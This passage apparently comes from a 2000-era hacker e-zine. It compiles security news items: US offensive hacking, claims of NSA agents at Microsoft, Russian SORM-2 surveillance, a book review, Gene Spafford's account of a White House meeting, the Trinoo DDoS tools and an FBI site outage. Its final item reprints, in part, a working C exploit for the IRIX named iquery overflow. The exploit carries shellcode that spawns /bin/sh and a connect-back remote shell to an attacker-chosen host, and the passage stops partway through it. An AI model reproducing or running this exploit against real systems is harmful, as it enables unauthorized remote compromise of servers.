      always talks about defensive cyber-warfare but clams up when it comes
      to offensive US cyber-operations. That is classified.
      
      However, it is certain that the US Government has already done more to
      disrupt the Internet than any other actor -- state-sponsored or
      freelance. For the past few years, US government hackers have
      penetrated networks at the European Parliament, Australian Stock
      Exchange, and banks in Athens, Nicosia, Moscow, Johannesburg, Beirut,
      Tel Aviv, Zurich, and Vaduz. The US also engaged in network
      penetrations in Yugoslavia during the NATO war against that country.
      
      Why don't NPR, CBS, ABC, NBC and the others focus on what the US is
      doing to disrupt the Internet? They are instead falling into a
      familiar Pentagon trap of deception and diversion.
      
      
      @HWA            
      
171.0 ISN:US Secret agents work at Microsoft
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      http://www.theage.com.au/breaking/0002/19/A27800-2000Feb19.shtml
      
      Source: AFP | Published: Saturday February 19, 7:44 AM
      
      PARIS, Feb 18 - A French intelligence report today accused US secret
      agents of working with computer giant Microsoft to develop software
      allowing Washington to spy on communications around the world.
      
      The report, drawn up by the Strategic Affairs Delegation (DAS), the
      intelligence arm of the French Defence Ministry, was quoted in today's
      edition of the newsletter Le Monde du Renseignement (Intelligence
      World).
      
      Written by a senior officer at the DAS, the report claims agents from
      the National Security Agency (NSA) helped install secret programmes on
      Microsoft software, currently in use in 90 per cent of computers.
      
      According to the report there was a 'strong suspicion' of a lack of
      security fed by insistent rumours about the existence of spy programs
      on Microsoft, and by the presence of NSA personnel in Bill Gates'
      development teams.
      
      The NSA protects communications for the US government, and also
      intercepts electronic messages for the Defence Department and other US
      intelligence agencies, the newsletter said.
      
      According to the report, 'it would seem that the creation of Microsoft
      was largely supported, not least financially, by the NSA, and that IBM
      was made to accept the (Microsoft) MS-DOS operating system by the same
      administration.'
      
      The report claimed the Pentagon was Microsoft's biggest client in the
      world.
      
      
      @HWA            
      
                        
172.0 ISN:Greek hackers attack U.S military installation?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      Hello,
      
      FYI, the Greek newspaper TA NEA has a story today about hacking attempts
      from three Greek Universities against an Arizona DoD installation. The
      article says that the US government asked the Greek one to find those
      responsible and have them interrogated by US agents. It seems the
      hackers managed to eventually crack the systems' security.
      
      No more news is available yet, but this must be the first time that
      something like that is said to be done through Greek servers. If there is
      any other info...
      
      T.B
      
      @HWA                              
      
173.0 ISN:KGB successor paid to infiltrate internet
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      http://www.techserver.com/noframes/story/0,2294,500171461-500220807-501048365-0,00.html
      
      By SERGEI SHARGORODSKY
      
      MOSCOW (February 21, 2000 9:07 p.m. EST http://www.nandotimes.com) -
      The KGB's successor is now also spying on the Internet, raising fears
      that the information it collects could be used for blackmail and
      business espionage.
      
      "The whole Federal Security Service will be crying tomorrow over your
      love letters," warns one of the banners angry Russian Web designers
      have posted on the Internet.
      
      Russian human-rights and free-speech advocates say the security
      service has already forced many of the country's 350 Internet service
      providers to install surveillance equipment.
      
      "Most Internet providers in Moscow, including all the large providers
      and many in the provinces, have opened a hole" for security agents to
      peep at traffic, said Anatoly Levenchuk, a Russian Internet expert.
      
      Like its counterparts in other countries, the Federal Security Service
      may argue it needs the monitoring system to catch spies, terrorists
      and bandits, and to combat black-market businesses and capital flight.
      
      But the system has raised particular alarm in Russia, where memories
      of KGB surveillance and repression remain fresh. And the abundance of
      secretly filmed, juicy videotapes and transcripts of telephone
      conversations in Russia seems to justify the fear of blackmail by
      renegade security agents or others who get hold of the information.
      
      Free-speech activists fear that the Internet surveillance is evidence
      of the security services' resurgence under acting President Vladimir
      Putin, a 15-year KGB veteran. They have already accused him of
      chipping away at press freedoms championed by former President Boris
      Yeltsin.
      
      Last week, a government official for the first time publicly
      acknowledged the existence of the Internet control project, called the
      System of Operative and Investigative Procedures or SORM-2, its
      Russian acronym.
      
      Alexei Rokotyan, the Communications Ministry's electronic
      communications department chief, denied that the project was aimed at
      "total control of the information that is transmitted via the global
      network."
      
      "Security organs and special forces have the right - and now the
      capability - to monitor private correspondence and telephone
      conversations of individual citizens according to the law," The Moscow
      Times daily quoted him as saying.
      
      Levenchuk and others said the Federal Security Service has been
      quietly implementing the system at least since 1998.
      
      "As you look at all these Orwellian things you understand it's coming
      - total control, total surveillance," Levenchuk told a round table
      held in St. Petersburg.
      
      Federal Security Service officials apparently view the steps simply as
      an extension of SORM regulations enacted in the mid-1990s, which allow
      security agents with a warrant to tap telephones and Internet traffic.
      
      At a series of meetings with Internet providers in 1998, security
      service officials described a system that would involve a box
      installed in providers' computers that would route electronic traffic
      to the local security service headquarters through a high-speed link.
      
      The project still seems a far cry from Echelon, a high-tech spying
      network which, according to a European Parliament report, is
      coordinated by the U.S. National Security Agency and involves "routine
      and indiscriminate" monitoring of electronic communications around the
      world.
      
      But Russia's Internet freedom activists are still raising the alarm.
      Levenchuk's www.libertarium.ru site is filled with accounts from
      mostly provincial providers that say they were forced to install
      SORM-2 equipment.
      
      One provider in southern Volgograd, Bayard-Slavia Communications,
      actually refused when security service agents sought to "receive full
      and uncontrolled access to all our clients and their communications,"
      its chief Nail Murzakhanov said.
      
      Bayard-Slavia had its main communication line cut off and faced
      threats of fines from government officials. But it won a court case
      against the security service last fall.
      
      Human rights advocates said Murzakhanov's confrontation with the
      Federal Security Service was enough to persuade many a reluctant
      provider.
      
      But Anton Nosik, who edits the Vesti.Ru and Lenta.Ru electronic
      newspapers, said the case was rare and that he was not aware of any
      major providers complying with the SORM-2 directives.
      
      Nosik was less concerned than others, saying security service agents
      already have access to electronic traffic and would not be able to
      monitor its ever-increasing volumes in full.
      
      "Yet there is an unpleasant trend of security services trying to
      implement non-constitutional norms," he said. "This should not be
      allowed."
      
      
      @HWA            
      
174.0 ISN:REVIEW: Security Technologies for the World Wide Web
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list

      From: "Rob Slade, doting grandpa of Ryan and Trevor" <rslade@sprint.ca>
      
      BKSCTCWW.RVW   20000113
      
      "Security Technologies for the World Wide Web", Rolf Oppliger, 2000,
      1-58053-045-1
      %A   Rolf Oppliger rolf.oppliger@acm.org,oppliger@computer.org
      %C   685 Canton St., Norwood, MA   02062
      %D   2000
      %G   1-58053-045-1
      %I   Artech House/Horizon
      %O   800-225-9977 fax: 617-769-6334 artech@artech-house.com
      %P   419 p.
      %T   "Security Technologies for the World Wide Web"
      
      In the preface, the author states that the book is first intended for
      Webmasters, who need practical configuration information, then for users
      who have security concerns, and finally for Web and electronic commerce
      developers.  He also says that the book can be used as an introduction,
      for self-study, as a course text, and as a reference.  A pretty tall
      order, but, by and large, Oppliger does a reasonable job of fulfilling the
      entire mandate.
      
      Chapter one, as an introduction, is possibly more than most people want to
      know.  However, the extra information (such as the explanation of HTTP
      [HyperText Transfer Protocol] requests and responses) does help provide an
      understanding of the underlying actions and concepts which are needed for
      a thorough view of security operations and requirements.  There is a
      detailed presentation of HTTP access control methods in chapter two.  The
      introduction to firewalls, in chapter three, is complete and helpful, with
      a wealth of user level information that is all too often omitted.  Chapter
      four is a solid introduction to the basics of cryptography.  Channel
      security at the data link, transfer, and application layers is the theme
      of chapter five, touching on tunneling, VPNs (Virtual Private Networks),
      IPsec, and various application protocols.  Chapter six expands two of
      these with details on the Secure Sockets Layer (SSL) and Transport Layer
      Security (TLS).
      
      Chapter seven gives an overview of electronic payment systems, with brief
      descriptions of the most common electronic cash, debit, and credit
      schemes.  The management of certificates, in chapter eight, mostly covers
      ongoing work in key infrastructure, with a good discussion of the
      important and difficult question of certificate revocation.  A fair and
      realistic review of active content is provided in chapter nine.  For
      slightly less active content, chapter ten discusses and shows examples of
      more secure practices for CGI (Common Gateway Interface) and API
      (Application Programming Interface) work. Mobile code and agents are still
      really future technology, and so are the proposed security functions in
      Chapter eleven.  The copyright discussion in chapter twelve is a little
      disappointing, since it seems primarily concerned with watermarking.
      Chapter thirteen looks at privacy, being dealt with by amateurs as usual,
      and, as usual, providing glimpses of fascinating work that is not widely
      known. There is a brief overview of censorship systems and problems in
      chapter fourteen.  Chapter fifteen concludes with a somewhat pessimistic
      review of the situation.
      
      The bibliographies at the end of every chapter contain solid works, and
      can be useful to those wanting further information.  They do, however,
      have a very definite academic flavour, in that most of the entries are
      articles or conference presentations, with books and online references
      making up a smaller portion of the whole.
      
      Oppliger's writing is rather dry and academic in tone, but the material
      presented is realistic, useful, and conceptually complete.  Despite the
      disparate audience range, the author has managed to provide something of
      value for all.  For the Web workers who are the primary audience, this
      book provides, if not a cookbook for security, a complete picture of the
      various aspects that must be addressed.
      
      copyright Robert M. Slade, 2000 BKSCTCWW.RVW 20000113
      
      @HWA      
      
175.0 ISN:Infosecurity at the White House
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      [Note: you may post this account or forward it to mailing lists, provided
      you pass the account and this notice in its entirety.]
      
      Infosecurity at the White House
      Gene Spafford
      
      Prolog
      
      Last week (ca. 2/8/00), a massive distributed denial of service attack was
      committed against a number of Internet businesses, including e-Bay, Yahoo,
      Amazon.com, and others. This was accomplished by breaking into hundreds
      (thousands?) of poorly-secured machines around the net and installing packet
      generation "slave" programs. These programs respond by remote control to
      send packets of various types to target hosts on the network. The resulting
      flood effectively shut those target systems out of normal operation for
      periods ranging up to several hours.
      
      The press jumped all over this as if it was something terribly new (it isn't
      -- experienced security researchers have known about this kind of problem
      for many years) and awful (it can be, but wasn't as bad as they make it out
      to be). One estimate in one news source speculated that over a billion
      dollars had been lost in lost revenue, downtime, and preventative measures.
      I'm skeptical of that, but it certainly is the case that a significant loss
      occurred.
      
      Friday, Feb 11, I got a call from someone I know at OSTP (Office of Science
      and Technology Policy) inquiring if I would be available to meet with the
      President as part of a special meeting on Internet security. I said "yes." I
      was not provided with a list of attendees or an agenda. Initially, I was
      told it would be a meeting of security experts, major company CEOs, and some
      members of the Security Council, but that was subject to change.
      
      The Meeting
      
      I arrived at the Old Executive Office Building prior to the meeting to talk
      with some staff from OSTP. These are the people who have been working on the
      Critical Infrastructure issues for some time, along with some in the
      National Security Council. They really "get it" about the complexity of the
      problem, and about academia's role and needs, and this may be one reason why
      this was the first Presidential-level meeting on information security that
      included academic faculty.
      
      After a few minutes, I was ushered into Dr. Neal Lane's office where we
      spent about 15 minutes talking. (As a scientist and polymath, I think Lane
      has one of the more fascinating jobs in the Executive Branch: that of
      Assistant to the President for Science and Technology and Director of OSTP.
      For instance, on his table he had some great photos of the Eros asteroid
      that had been taken the day before.) We then decided to walk over to the
      White House (next door) where we joined the other attendees who were waiting
      in a lobby area.
      
      Eventually, we were all escorted upstairs to the Cabinet Room. It was a
      tight fit, as there were over 30 of us, staff and guests (invitee list at
      the end). We then spent a half hour mingling and chatting. There were a lot
      of people I didn't know, but that's because normally I don't get to talk to
      CEOs. Most notably, there were people present from several CERIAS sponsor
      organizations (AT&T, Veridian/Trident, Microsoft, Sun, HP, Intel, Cisco). I
      also (finally!) got to meet Prof. David Farber in person. We've "known" each
      other electronically for a long time, but this was our first in-person
      meeting.
      
      After a while, some more of the government folk joined the group: Attorney
      General Reno; Commerce Secretary Daley; Richard Clarke, the National
      Coordinator for Security, Infrastructure Protection and Counter-terrorism;
      and others. After some more mingling, I deduced the President was about to
      arrive -- several Secret Service agents walked through the room giving
      everyone a once-over. Then, without any announcement or fanfare, the
      President came into the room along with John Podesta, his chief of staff.
      
      President Clinton worked his way around the room, shaking everyone's hand
      and saying "hello." He has a firm handshake. In person, he looks thinner
      than I expected, and is not quite as tall as I expected, either.
      
      We all then sat down at assigned places. I had the chair directly opposite
      the President. Normally, it is the chair of the Secretary of State. To my
      left was Whit Diffie of Sun, and to my right was John Podesta. I was
      actually surprised that I had a seat at the table instead of in the
      "overflow" seats around the room.
      
      The press was then let into the room. It was quite a mass. The President
      made a statement, as did Peter Solvik of Cisco. The press then asked several
      questions (including one about oil prices that had nothing to do with the
      meeting). Then, they were ushered out and the meeting began.
      
      The President asked a few individuals (Podesta, Daley, Reno, Pethia, Noonan)
      to make statements on behalf of a particular segment of industry or
      government, and then opened it up for discussion. The next hour went by
      pretty quickly. Throughout, the President listened carefully, and seemed
      really involved in the discussion. He asked several follow-up questions to
      things, and steered the discussion back on course a few times. He followed
      the issues quite well, and asked some good follow-up questions.
      
      During the discussion, I made two short comments. The first was about how it
      was important that business and government get past using cost as the
      primary deciding factor in acquiring computer systems, because quality and
      safety were important. I went on to say that it was important to start
      holding managers and owners accountable when their systems failed because of
      well-known problems. I observed that if the government could set a good
      example in these regards, others might well follow.
      
      My second comment was on the fact that everyone was talking about "business
      and government" at the meeting but that there were other players, and that
      academia in particular could play an important part in this whole situation
      in cooperation with everyone else. After all, academia is where much of the
      research gets done, and where the next generation of leaders, researchers,
      and businesspeople are coming from!
      
      Overall, the bulk of the comments and interchange were reasoned and polite.
      I only remember two people making extreme comments (to which the rest of us
      gave polite silence or objections); I won't identify the people here, but
      neither were CERIAS sponsors :-). One person claimed that we were in a
      crisis and more restrictions should be placed on publishing vulnerability
      information, and the other was about how the government should fund
      "hackers" to do more offensive experimentation to help protect systems. My
      summary of the major comments and conclusions is included below.
      
      After considerable discussion, the meeting concluded with Dick Clarke
      reminding everyone that the President had submitted a budget to Congress
      with a number of new and continuing initiatives in information security and
      cybercrime investigation, and it would be up to Congress to provide the
      follow-through on these items.
      
      We then broke up the meeting, and the President spent a little more time
      shaking hands and talking with people present. Buddy (his dog) somehow got
      into the room and "met" several of us, too -- I got a head-butt in the side of
      my leg as he went by. :-) The official photographer got a picture of the
      President shaking my hand again.
      
      The President commented to Vint Cerf how amazed he was that the group had
      been so well-behaved --- we listened to each other, no one made long
      rambling speeches, and there was very little posturing going on. Apparently,
      similar groups from other areas are quite noisy and contentious.
      
      We (the invitees) then went outside where there was a large crowd of the
      press. Several of us made short statements, and then broke up into groups
      for separate interviews. After that was done, I left and returned home to
      teach class on Wednesday.
      
      My interview with the local news station didn't make it on the 6pm news, and
      all the print accounts seemed to make a big deal of the fact that "Mudge" was
      at the meeting. Oh well, I thought "Spaf" was a way-cool "handle", better
      than "Mudge" but it doesn't go over as well with the press for some reason.
      I'll have to find some other way to develop a following of groupies. :-)
      
      On Friday, I was back in DC at the White House conference center to
      participate in a working session with the PCAST (President's Committee of
      Advisors on Science & Technology) to discuss the structure and organization
      of the President's proposed Institute for Information Infrastructure
      Protection. This will have a projected budget of $50 million per year.
      CERIAS is already doing a significant part of what the IIIP is supposed to
      address (but at a smaller scale). Thus, we may have a role to play in that
      organization, as will (I hope) many of the other established infosec
      centers. The outcome of that meeting was that the participants are going to
      draft some "strawman" documents on the proposed IIIP organization for
      consideration. I am unsure whether this is significant progress or not.
      
      Outcomes
      
      I didn't enter the meeting with any particular expectations. However, I was
      pleasantly surprised at the sense of cooperation that permeated the meeting.
      I don't think we solved any problems, or even set an agenda of exactly what
      to do. There was a clear sense of resistance from the industry participants
      to any major changes in regulations or Internet structure. In fact, most of
      the companies represented did not send CEOs so that (allegedly) there would
      be no one there who could make a solid commitment for their firms should the
      President press for some action.
      
      Nonetheless, there were issues discussed, some subsets of those present did
      agree to meet and pursue particular courses of action, and we were reminded
      about the President's info protection plan. To be fair, this is an area that
      has been getting attention from the Executive Branch for several years, so
      this whole event shouldn't be seen as a sudden reaction to specific events.
      Rather, from the PCCIP on, there has been concern and awareness of the
      importance of these issues. This was simply good timing for the President to
      again demonstrate his concern, and remind people of the national plan that
      was recently released.
      
      I came away from the meeting with the feeling that a small, positive step
      had been made. Most importantly, the President had made it clear that
      information security is an area of national importance and that it is taken
      seriously by him and his administration. By having Dave Farber and myself
      there, he had also made a statement to the industry people present that his
      administration takes the academic community seriously in this area. (Whether
      many of the industry people got that message -- or care -- remains to be
      seen.)
      
      I recall that there were about 7 major points made that no one disputed:
      1) The Internet is international in scope, and most of the companies present
      have international operations. Thus, we must continue to think globally. US
      laws and policies won't be enough to address all our problems.
      2) Privacy is a big concern for individuals and companies alike. Security
      concerns should not result in new rules or mechanisms that result in
      significant losses of privacy.
      3) Good administration and security hygiene are critical. The problems of
      the previous week were caused by many sites (including, allegedly, some
      government sites) being compromised because they were not maintained and
      monitored. This, more than any perceived weakness in the Internet, led to
      the denial of service.
      4) There is a great deal of research that yet needs to be done.
      5) There are not enough trained personnel to deal with all our security
      needs.
      6) Government needs to set a good example for everyone else, by using good
      security, employing standard security tools, installing patches, and
      otherwise practicing good infosec.
      7) Rather than new structure or regulation, broadly-based cooperation and
      information sharing is the near-term approach best suited to solving these
      kinds of problems.
      
      Let's see what happens next. I hope there is good follow-through by some of
      the parties in attendance, both within and outside government.
      
      Miscellany
      
      Rich Pethia of CERT, Alan Paller of SANS, and I have drafted a short list of
      near-term actions that sites can implement to help prevent a recurrence of
      the DDOS problems. Alan is going to coordinate input from a number of
      industry people, and then we will publicize this widely. It isn't an agenda
      for research or long-term change, but we believe it can provide a concrete
      set of initial steps. This may serve as a good model for future such
      collaborative activities.
      
      I was asked by several people if I was nervous. Actually, no. I've been on
      national television many times, and I've spoken before crowds of nearly a
      thousand people. Actually, *he* should have been nervous -- I have tenure,
      and he clearly does not. :-)
      
      The model we have at CERIAS with the partnership of industry and academia is
      exactly what is needed right now. Our challenge is to find some ways to
      solve our faculty needs and space shortage. In every other way, we're
      ideally positioned to continue to make a big difference in the coming years.
      
      Of the 29 invited guests, there was only one woman and one member of a
      traditional minority. I wonder how many of the people in the room didn't
      even notice?
      
      Attendees
      
      Douglas F. Busch
      Vice President of Information Technology, Intel
      
      Clarence Chandran
      President, Service Provider & Carrier Group, Nortel Networks
      
      Vinton Cerf
      Senior Vice President, Internet & Architecture & Engineering, MCI Worldcom
      
      Christos Cotsakos
      Chief Executive Officer, E-Trade Group, Inc.
      
      Jim Dempsey
      Senior Staff Counsel, Center for Democracy and Technology
      
      Whitfield Diffie
      Corporate Information Officer, Sun Microsystems
      
      Nick Donofrio
      Senior Vice President and Group Executive, Technology & Manufacturing, IBM
      
      Dave Farber
      University of Pennsylvania
      
      Elliot Gerson
      Chief Executive Officer, Lifescape.com
      
      Adam Grosser
      President, Subscriber Networks, Excite@home
      
      Stephen Kent
      BBN Technologies (GTE)
      
      David Langstaff
      Chairman and Chief Executive Officer, Veridian
      
      Michael McConnell
      Booz-Allen
      
      Mary Jane McKeever
      Senior Vice President, World Markets, AT&T
      
      Roberto Medrano
      Senior Vice President, Hewlett Packard
      
      Harris N. Miller
      President, Information Technology Association of America (ITAA)
      
      Terry Milholland
      Chief Information Officer, EDS
      
      Tom Noonan
      Internet Security Systems (ISS)
      
      Ray Oglethorpe
      President, AOL Technologies, America Online
      
      Alan Paller
      Chairman, SANS Institute
      
      Rich Pethia
      CERT/CC, SEI at Carnegie-Mellon University
      
      Geoff Ralston
      Vice President for Engineering, Yahoo!
      
      Howard Schmidt
      Chief Information Security Officer, Microsoft
      
      Peter Solvik
      Chief Information Officer, Cisco Systems
      
      Gene Spafford
      CERIAS at Purdue University
      
      David Starr
      Chief Information Officer, 3Com
      
      Charles Wang
      Chief Executive Officer, Computer Associates International
      
      Maynard Webb
      President, Ebay
      
      Peiter Zatko a.k.a. "Mudge"
      @stake
      
      --
      COMPASS [for the CDC-6000 series] is the
      sort of assembler one expects from a corporation
      whose president codes in octal. -- J.N. Gray
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA            
      
176.0 ISN:New hacker software could spread by email
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list

      By John Borland
      Staff Writer, CNET News.com
      February 23, 2000, 4:35 a.m. PT
      URL: http://news.cnet.com/category/0-1005-200-1555637.html
      
      A group of anonymous programmers has released a new version of the
      software that may have helped shut down Yahoo and Amazon.com earlier
      this month--one that makes it far easier to launch attacks, computer
      experts say.
      
      The tools, a new version of a software package dubbed "Trinoo," could
      allow attackers to infiltrate ordinary desktop computers through an
      innocent-looking email attachment. These computers--particularly those
      connected to high-speed Internet services--could then be used as
      unwitting accomplices in assaults on other Web sites, security
      analysts say.
      
      "(The previous attacks) took someone who knew what they were doing,"
      Trend Micro spokesman David Perry said. "This turns it into a
      kid-on-the-street problem."
      
      The release of these tools follows some of the highest-profile
      computer attacks in the Web's history. Using a method dubbed
      "distributed denial of service attacks," computer vandals successfully
      rendered Yahoo, Amazon, eBay and a handful of other big Web sites
      paralyzed for hours at a time by swamping them with a multitude of
      simultaneous requests.
      
      The attacks have spurred law enforcement investigations around the
      globe, but the FBI has not reported any major breakthroughs in the
      case.
      
      Some speculation has centered on several individuals with hacker
      nicknames like "mafiaboy." Canadian authorities investigated an
      Internet service provider last week that once hosted a "mafiaboy"
      hacker-related site. But Canadian police said today that they had no
      progress to report in their investigation.
      
      Although no conclusive evidence has been released on exactly what
      tools were used in the denial of service attacks, recent speculation
      has focused on tools with names like Trinoo, Tribe Flood Network and
      Stacheldraht (German for "barbed wire").
      
      These tools allow an attacker to place agents on "zombie" computers
      around the world and then wake them up simultaneously to launch a
      crippling stream of Web traffic at a target site. Security officials
      at the FBI and other computer security agencies have been warning of
      the danger these tools pose for several months and have provided
      software to help guard against their use.
      
      But the new version of Trinoo heightens the danger because it makes
      attacks easier to launch. Because the new version can infiltrate
      Windows NT-, Windows 95- and Windows 98-based machines, far more
      computers are at risk of becoming hosts.
      
      The Windows version also allows the tools to be spread as apparently
      innocuous email attachments, much like ordinary viruses. Computer
      security experts say they haven't seen this happen yet, but that the
      Windows platform makes it relatively easy to do.
      
      "This does make (denial of service attacks) easier," said Elias Levy,
      chief technical officer for SecurityFocus.com, a computer security Web
      site. "Not that it required a lot of intelligence or skill before. But
      this does bring it down another notch."
      
      The new tools are largely a threat to users with always-on DSL
      (digital subscriber line) or cable modem connections, analysts said.
      
      This kind of threat has been seen before with the Back Orifice
      software, Levy noted. That package, once surreptitiously installed on
      a system, allows an outside person to control the computer remotely.
      The Trinoo package is geared more specifically for launching denial of
      service attacks, however.
      
      Most of the major antivirus firms have already developed or are
      developing tools to scan for and remove the new Trinoo software.
      
      
      ---------------------------------------------------
      "Communications without intelligence is noise;
      Intelligence without communications is irrelevant."
      Gen. Alfred. M. Gray, USMC
      ---------------------------------------------------
      C4I Secure Solutions             http://www.c4i.org
      *=================================================*
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA      
      
177.0 ISN:FBI Admits site was defaced
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      http://www.sjmercury.com/svtech/news/breaking/ap/docs/252799l.htm
      
      FBI admits its site was attacked
      
      BY TED BRIDIS
      AP Technology Writer
      
      WASHINGTON (AP) -- The FBI acknowledged Friday that electronic vandals
      shut down its own Internet site for hours last week in the same type of
      attack that disrupted some of the Web's major commercial sites.
      
      The bureau's Web site, www.fbi.gov, remained inaccessible for more than
      three hours Feb. 18 because vandals overwhelmed it by transmitting
      spurious signals.
      
      ``The FBI has made comments they're going to find who's responsible for
      the latest attacks, so it's a bit of war between the hackers and the
      bureau,'' said James Williams, a Chicago lawyer and former FBI agent who
      specialized in investigating computer crimes.
      
      The technique, which doesn't require particular sophistication, is similar
      to repeatedly dialing a phone number to block all other incoming calls.
      Last year, the FBI pulled down its World Wide Web site for days after
      hackers overwhelmed it using the same type of attack.
      
      No one has claimed responsibility for launching last week's attack against
      the same law enforcement agency that is investigating serious disruptions
      earlier this month at Yahoo!, eBay, ETrade, Amazon.Com and others.
      
      ``Pretty much anyone is a target,'' agreed John McGowan, a research
      engineer at ICSA.Net, a computer security firm. He wasn't surprised no one
      has claimed credit.
      
      ``I don't think I'd want to go around bragging that it was my group that
      shut down the FBI,'' McGowan said. ``They're certainly turning up the
      carpets and looking for anything they can find.''
      
      The FBI said last week that it couldn't determine whether the problem was
      a technical fault or malicious attack, but a spokeswoman, Deborah
      Weierman, confirmed Friday that vandals were responsible. She declined to
      say whether there was any evidence, other than the coincidence in timing,
      to link last week's attack against the FBI to those against other Web
      sites.
      
      The FBI noted that its computers weren't broken into, and that its
      affected Internet site is separate from all its internal systems,
      including investigative files. ``We have had no more problems since
      then,'' Weierman said.
      
      Engineers at IBM, who run the FBI's Internet site under a federal
      contract, ``took the appropriate steps to get our Web site back and
      running (and) continue to look into remedies and actions to minimize this
      from happening again,'' Weierman said.
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA            
      
178.0 IRIX 5.3 and 6.2 remote bind iquery overflow by LSD
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      98? not 0-day is it? heh...
      
      
      Source: Packetstorm
      
      /*   Copyright (c) May 1998       Last Stage of Delirium   */
      /*      THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF      */
      /*                  Last Stage of Delirium                  */
      /*                                                          */
      /*   The contents of this file  may be disclosed to third   */
      /*   parties, copied and duplicated in any form, in whole   */
      /*   or in part, without the prior written consent of LsD.  */
      
      /* SGI named remote overflow exploit                        */
      /* tested on IRIX 5.3 and 6.2 including multiprocessor and  */ 
      /* multicache machines                                      */
      /* won't work on IRIX64 6.2 since its named binary seems to */
      /* be not vulnerable to the iquery overflow                 */
      
      /* usage ./r local_adr local_port target                    */
      /* you must specify the local_adr and local_port since      */ 
      /* the remote shell is a connecting shell not a classic     */
      /* bind shell (it connects with the local machine)          */
      
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <unistd.h>
      #include <netdb.h>
      #include <stdio.h>
      #include <fcntl.h>
      #include <errno.h>
      
      #define START_ADR       0x10040100      
      
      #define PUTADR(p,adr) {*p=(adr>>24)&0xff;*(p+1)=(adr>>16)&0xff;*(p+2)=(adr>>8)&0xff;*(p+3)=adr&0xff;}
      
      #define PUTADRH(p,adr) {*p=(adr>>24)&0xff;*(p+1)=(adr>>16)&0xff;}
      #define PUTADRL(p,adr) {*p=(adr>>8)&0xff;*(p+1)=adr&0xff;}
      
      char tablica[25]={
      0x00,0x00,0x34,0x34,0x09,0x80,0x00,0x00,
      0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
      0x01,0x00,0x01,0x20,0x20,0x20,0x20,0x00,0x00};
      
      char asmcode[]={
      0x24,0x04,0x00,0x02,0x24,0x05,0x00,0x02,0x24,0x06,0x00,0x00,0x24,0x02,0x04,0x53,
      0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x40,0x80,0x25,0x00,0x40,0x20,0x25,
      0x3c,0x05,0x10,0x04,0x34,0xa5,0xff,0xff,0x24,0x06,0x00,0x10,0x24,0x02,0x04,0x43,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x24,0x02,0x03,0xee,0x24,0x04,0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x24,0x02,0x03,0xee,0x24,0x04,0x00,0x01,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x24,0x02,0x03,0xee,0x24,0x04,0x00,0x02,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x02,0x00,0x20,0x25,0x24,0x02,0x04,0x11,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x02,0x00,0x20,0x25,0x24,0x02,0x04,0x11,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x02,0x00,0x20,0x25,0x24,0x02,0x04,0x11,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x3c,0x04,0x10,0x01,0x34,0x84,0xff,0xf1,0x3c,0x05,0x10,0x02,0x34,0xa5,0xff,0xf2,0x24,0x02,0x03,0xf3,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,
      '/','b','i','n','/','s','h',0, 
      0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,
      0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00  
      };
      
      main(int argc,char **argv){
          int sck,i,srvsck;
          fd_set readfs;
          struct sockaddr_in address;
          struct sockaddr_in local;
          struct hostent *hp;
          int size;
          unsigned long lregt9,lreggp,lstart,lbcop7,ltmp;
          char regt9[4],reggp[4],start[4],bcop7[4];   
          char *b,*p;
          
          printf("IRIX named remote exploit\n");
          printf("Last Stage of Delirium, May 1998, Poland\n\n");
      
          if(argc!=4){
              printf("usage: %s local_adr local_port target\n",argv[0]);exit(1);
          }
      
          srvsck=socket(AF_INET,SOCK_STREAM,0);
      
          bzero(&local,sizeof(local));
          local.sin_family=AF_INET;
          local.sin_port=htons(atoi(argv[2]));
          if((local.sin_addr.s_addr=inet_addr(argv[1]))==-1){
              if((hp=gethostbyname(argv[1]))==NULL){
                  printf("error: address.\n");exit(-1);
              }
              memcpy(&local.sin_addr.s_addr,hp->h_addr,4);
          }
          if (bind(srvsck,(struct sockaddr *)&local,sizeof(local))<0) {
             perror("error");exit(-1);
           } 
      
          lbcop7=lregt9=START_ADR;
          lstart=START_ADR+0x14;      
          lreggp=START_ADR+0x8024;    
          PUTADR(regt9,lregt9);
          PUTADR(reggp,lreggp);
          PUTADR(start,lstart);
          PUTADR(bcop7,lbcop7);
      
          ltmp=START_ADR+0xd8;
          PUTADRH(&asmcode[0x34-20+2],ltmp);
          PUTADRL(&asmcode[0x38-20+2],ltmp);
          ltmp=START_ADR+0xc8;
          PUTADRH(&asmcode[0xa8-20+2+4],ltmp);
          PUTADRL(&asmcode[0xac-20+2+4],ltmp);
          PUTADR(&asmcode[0xcc-20+4],ltmp);
          ltmp=START_ADR+0xd0;
